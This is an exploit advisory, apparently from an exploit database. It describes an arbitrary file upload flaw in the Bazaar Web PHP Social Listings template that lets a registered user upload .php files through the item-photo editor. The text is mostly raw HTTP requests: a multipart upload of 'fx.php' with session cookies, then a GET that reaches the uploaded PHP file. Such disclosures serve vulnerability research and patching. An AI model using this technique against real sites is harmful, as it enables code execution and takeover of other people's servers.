<-- # Exploit Title: Bazaar Web PHP Social Listings Arbitrary File Upload # Google Dork: N/A # Date: 19/12/2021 # Exploit Author: Sohel Yousef - sohel.yousef@yandex.com # Software Link: https://codecanyon.net/item/bazaar-social-listing-shopping-web-php-template/23207913 # Software Demo :https://xserver.app/__apps/bazaar-web/index.php# # Category: webapps 1. Description Bazaar Web PHP Social Listings script contain arbitrary file upload registered user can upload .php files in Edit an item section without any security list item link : localhost bazaar-web/list-item-info.php edit item photos and upload php files and inspect element your php direction uploaded file direction local host bazaar/uploads/yourfile.php just right click the photo and use inspect element you will have your direction Host: (HOST) Accept: */* Accept-Language: ar,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate, br X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------47450779111254302601850437199 Content-Length: 63132 Connection: keep-alive Referer: https:/localhost/bazaar-web/list-item-info.php?itemID=uT8aeJcTu5 Cookie: AWSALB=BOOAELkwd/6yNqpv36ou/NXmOgXJcpsfK+qMH36RZwhotfk/zd8hoyDpbc2Qt4nwl1mw8CBJm0bJTwoci7kY6kAfwutcXuxjFCKoSPXqis2mMnE1ab8qwGquZOYI; AWSALBCORS=BOOAELkwd/6yNqpv36ou/NXmOgXJcpsfK+qMH36RZwhotfk/zd8hoyDpbc2Qt4nwl1mw8CBJm0bJTwoci7kY6kAfwutcXuxjFCKoSPXqis2mMnE1ab8qwGquZOYI; PHPSESSID=o0it0cquadspsgh864fr4mvtrt Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin file=fx.php&fileName=fx.php GET https://localhost/bazaar/uploads/pZ2CGSkezbiDprchqpZ7_fx.php Host: HOST User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: image/avif,image/webp,*/* Accept-Language: ar,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate, br Connection: keep-alive Referer: https://localhost/bazaar-web/list-item-info.php?itemID=uT8aeJcTu5 Cookie: AWSALB=Zl/BPrqEgbVqCknGhgr3fTBKhe+vxhq2WkKOn6NZEvstF659/bY85gK5a9rehQC9ejX8mXIhp/F5HoMd7iiNXUs0PKBGysX6kGrjeS2ZnnmHHfe6wwZNqWYQbbRx; AWSALBCORS=Zl/BPrqEgbVqCknGhgr3fTBKhe+vxhq2WkKOn6NZEvstF659/bY85gK5a9rehQC9ejX8mXIhp/F5HoMd7iiNXUs0PKBGysX6kGrjeS2ZnnmHHfe6wwZNqWYQbbRx; PHPSESSID=o0it0cquadspsgh864fr4mvtrt Sec-Fetch-Dest: image Sec-Fetch-Mode: no-cors Sec-Fetch-Site: same-origin ##### -->